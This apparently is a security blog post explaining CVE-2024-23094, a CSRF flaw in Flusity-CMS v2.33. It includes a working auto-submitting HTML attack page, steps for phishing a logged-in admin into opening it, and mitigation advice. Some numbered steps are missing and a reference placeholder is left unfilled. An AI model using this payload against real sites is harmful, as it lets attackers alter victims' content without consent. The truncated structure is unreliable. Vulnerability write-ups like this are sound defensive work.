Flusity-CMS is an open-source content management system that’s seen some use among indie devs and small sites. But in 2024, security researchers discovered a critical vulnerability in version 2.33: a Cross-Site Request Forgery (CSRF) flaw allowing attackers to exploit /cover/addons/info_media_gallery/action/edit_addon_post.php. In this guide, we’ll break down how this exploit works, share code snippets, and discuss how to stay secure.
What is CVE-2024-23094?
CVE-2024-23094 is the official ID for a CSRF vulnerability found in Flusity-CMS v2.33. In simple terms, CSRF is when a malicious website or email makes your browser unknowingly trigger actions (like editing posts or changing settings) on another site where you are logged in.
In this case, any logged-in user—even admins—could be tricked into performing unwanted actions via crafted requests to Flusity-CMS’s /cover/addons/info_media_gallery/action/edit_addon_post.php.
Reference:
- NVD - CVE-2024-23094
- Exploit details on Exploit Database *(replace XXXXXX with the correct ID if available)*
Why Does it Happen?
The edit_addon_post.php script in Flusity-CMS v2.33 doesn’t check for CSRF tokens. That means when a form is submitted, the system trusts it came from a real user even if it didn't. There are no tokens or headers to confirm the request came from a genuine source.
Action: Victim is tricked into visiting the attacker’s page—through email, link, etc.
4. Trigger: The attack page silently submits a POST request to /cover/addons/info_media_gallery/action/edit_addon_post.php.
5. Result: If successful, data is changed in the CMS as if the victim did it. This could mean overriding images, changing gallery data, or even uploading malicious content if allowed.
The Exploit: Code Example
Here’s a sample malicious HTML file (csrf_attack.html). When visited by an authenticated Flusity-CMS user, it’ll submit a forged request:
<!DOCTYPE html>
<html>
<body>
<!-- Auto-submit the hidden form on page load -->
<form id="csrfForm" action="http://victim-site.com/cover/addons/info_media_gallery/action/edit_addon_post.php"; method="POST">
<input type="hidden" name="id" value="1">
<input type="hidden" name="title" value="Hacked Title by CSRF">
<input type="hidden" name="desc" value="This description was set via CSRF">
<!-- Add other fields as needed by the CMS -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
*Note: Modify the field names to match what Flusity-CMS expects.*
Host the File: Place your HTML file on a public server.
2. Send the Link: Send the link to a logged-in Flusity-CMS admin (phishing, social engineering, etc.).
3. Automatic Request: When the victim opens the link, their browser auto-submits the form. Flusity-CMS has no CSRF check, so it updates the media gallery data.
How to Prevent This
1. Add CSRF Tokens: All forms that change data in Flusity-CMS should include a unique CSRF token. The server checks this token before processing.
2. Restrict HTTP Referer: Make sure requests actually come from your domain. Checking the Referer header is a basic, though not foolproof, step.
Set SameSite Cookies: Helps prevent cookies from being used in cross-site requests.
Recommended resource for developers:
- OWASP CSRF Prevention Cheat Sheet
Patch Status
As of the time of writing, there is no official patch from the Flusity-CMS maintainers. If you rely on Flusity-CMS, you should:
Conclusion
CVE-2024-23094 is a classic but critical CSRF flaw that lets attackers manipulate Flusity-CMS installations without direct access. Until a vendor patch is released, securing your system with custom tokens and user education is key.
Original references:
- NVD Entry for CVE-2024-23094
- OWASP CSRF Guide
*Stay vigilant, patch early, and always double-check what your forms accept!*
Timeline
Published on: 02/22/2024 14:15:46 UTC
Last modified on: 08/01/2024 13:47:04 UTC